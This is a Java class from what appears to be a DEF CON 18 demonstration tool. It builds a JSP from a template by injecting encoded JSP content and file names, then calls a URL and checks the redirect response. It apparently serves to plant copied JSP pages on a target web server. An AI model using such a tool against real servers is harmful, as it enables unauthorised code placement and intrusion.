package net.darkmist.defcon18;

import java.io.IOException;
import java.util.regex.Pattern;

import org.apache.commons.httpclient.DefaultHttpMethodRetryHandler;
import org.apache.commons.httpclient.Header;
import org.apache.commons.httpclient.HttpClient;
import org.apache.commons.httpclient.HttpMethodBase;
import org.apache.commons.httpclient.methods.GetMethod;
import org.apache.commons.httpclient.params.HttpMethodParams;
import org.apache.commons.io.IOUtils;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

public class JSPCopy
{
	private static final Class<JSPCopy> CLASS = JSPCopy.class;
	private static final Logger logger = LoggerFactory.getLogger(CLASS);
	private static final String JSP_RESOURCE = "jsp";
	private static final Pattern JSP_CONTENT_PAT = Pattern.compile("@@JSP_CONTENT@@");
	private static final String JSP_NAME_PREFIX_DEFAULT = "cpy.";
	private static final Pattern JSP_NAME_PREFIX_PAT = Pattern.compile("@@JSP_NAME_PREFIX@@");
	private static final String JSP_NAME_SUFFIX_DEFAULT = ".jsp";
	private static final Pattern JSP_NAME_SUFFIX_PAT = Pattern.compile("@@JSP_NAME_SUFFIX@@");
	private static final Pattern JSP_OUTPUT_PAT = Pattern.compile("@@JSP_OUTPUT@@");
	private static CharSequence JSP_BASE = Util.getResourceStringRef(CLASS, JSP_RESOURCE);
	private String namePrefix;
	private String nameSuffix;
	private String output;
	private HttpClient httpClient;

	public JSPCopy(HttpClient client, String prefix, String suffix, String output)
	{
		if(client == null)
		{
			client = new HttpClient();
			client.getParams().setParameter(HttpMethodParams.RETRY_HANDLER, new DefaultHttpMethodRetryHandler(0, false));
		}
		this.httpClient = client;
		if(prefix == null)
			prefix = JSP_NAME_PREFIX_DEFAULT;
		this.namePrefix = prefix;
		if(suffix == null)
			suffix = JSP_NAME_SUFFIX_DEFAULT;
		this.nameSuffix = suffix;
		if(output == null)
			output = Util.randToken();
		this.output = output;
	}

	public JSPCopy()
	{
		this(null,null,null,null);
	}

	public static String generate(String jspToCopy, String filePrefix, String fileSuffix, String output)
	{
		String jsp;

		jsp = JSP_NAME_PREFIX_PAT.matcher(JSP_BASE).replaceAll(filePrefix);
		jsp = JSP_NAME_SUFFIX_PAT.matcher(jsp).replaceAll(fileSuffix);
		jsp = JSP_OUTPUT_PAT.matcher(jsp).replaceAll(output);
		jsp = JSP_CONTENT_PAT.matcher(jsp).replaceAll(Util.encode(jspToCopy));
		//logger.debug("final jsp={}", jsp);
		return jsp;
	}

	public String generate(String jspToCopy)
	{
		return generate(jspToCopy, namePrefix, nameSuffix, output);
	}

	private static String getLocationHeader(HttpMethodBase meth) throws JSPCallException
	{
		Header[] locations;

		locations = meth.getResponseHeaders("location");
		if(locations == null)
			throw new JSPCallException("No location header");
		if(locations.length <= 0)
			throw new JSPCallException("Multiple location headers: " + Util.join(" ", (Object[])locations));
		return locations[0].getValue();
	}

	public String call(String url) throws JSPCallException, IOException
	{
		GetMethod get;
		int code;
		String body;

		get = new GetMethod(url);
		get.setFollowRedirects(false);
		code = httpClient.executeMethod(get);
		try
		{
			body = IOUtils.toString(get.getResponseBodyAsStream());
			logger.debug("status: {} {}", code, get.getStatusLine());
			logger.debug("body: {}", body);
			if(code < 300 || 400 <= code)
				throw new JSPCallException("Status code not redirect but " + code + ' ' + get.getStatusLine() + "\n" + Util.join("", (Object[])get.getResponseHeaders()) + "\n\n" + body);
			if(!body.contains(output))
				throw new JSPCallException("Result body does not contain output \"" + output + "\": " + body);
			return getLocationHeader(get);
		}
		finally
		{
			get.releaseConnection();
		}
	}
}
